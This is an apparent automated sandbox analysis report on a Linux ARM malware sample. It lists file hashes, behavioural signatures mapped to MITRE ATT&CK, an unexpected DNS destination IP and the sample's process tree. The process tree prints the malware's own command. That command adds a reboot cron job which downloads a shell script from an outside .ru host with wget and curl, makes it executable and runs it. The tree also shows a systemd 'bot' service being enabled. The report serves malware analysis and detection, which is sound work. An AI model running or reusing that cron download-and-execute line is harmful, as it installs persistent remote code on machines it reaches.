Analysis
-
max time kernel
144s -
max time network
183s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
05-11-2024 02:39
Static task
static1
Behavioral task
behavioral1
Sample
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf
Resource
debian9-armhf-20240611-en
General
-
Target
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf
-
Size
102KB
-
MD5
1f7962f8e2708017e911356bd757a2c3
-
SHA1
5373c75e3b2c1e0a9176753d0d00ef25207796be
-
SHA256
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
-
SHA512
771402e35c3b6abef0ce977fe4ac7a48eedec1e9fba1d5717850a80f7d7d517be9b370d11da4707149206c076f281ba9b19819a924cc47e7c6f6c845f04bf4d0
-
SSDEEP
1536:FinUc/4KvNLvHqHY+4/QnsasEPvS7sHTvlmlc9ivcfwWTu2SMTZUYHQY9X:Fwo34/QnsasyvS7sT8Owku2SMTujY9X
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
shpid Process 673 sh -
Renames itself 1 IoCs
Processes:
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elfpid Process 671 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 194.36.144.87 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.SlgGcx crontab -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elfdescription ioc Process File opened for modification /lib/systemd/system/bot.service 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf -
Changes its process name 1 IoCs
Processes:
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elfdescription ioc pid Process Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS 671 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf -
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
-
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
systemctldescription ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Processes:
crontabcrontabsystemctl3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elfdescription ioc Process File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/mounts 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf
Processes
-
/tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf/tmp/3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681.elf1⤵
- Renames itself
- Modifies systemd
- Changes its process name
- Reads runtime system information
PID:671 -
/bin/sh/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:673 -
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:678
-
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:677
-
-
-
/bin/sh/bin/sh -c "/sbin/initctl start bot"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:684 -
/sbin/initctl/sbin/initctl start bot3⤵PID:685
-
-
-
/bin/sh/bin/sh -c "/bin/systemctl enable bot"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:687 -
/bin/systemctl/bin/systemctl enable bot3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:688
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
346B
MD59722585f219a220a4dc2a0c49bd3b019
SHA1ffba476658ea681147c570c6f2b16a79e7d38e19
SHA256bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d
SHA51277f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4
-
Filesize
302B
MD5a4e30f6ce6fb6cf00e133f3c93fb5449
SHA167b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25
-
Filesize
306B
MD51d0bf56bdb32d8a884196a2a712007ec
SHA1a201a1cfcc93806302241e8adeddcc80187ff68c
SHA256ed1b0a18ecd01c30cde93753a50554218fd91f32428ee795a0c06c91259c24d3
SHA51266d4d60fc1d7d24b99172591580e0c89ee874937c1d04072813f272498fc685cd8d6e05dc59264afa255499311d4216a76a8fb1adb73229178037fc51c2eeeed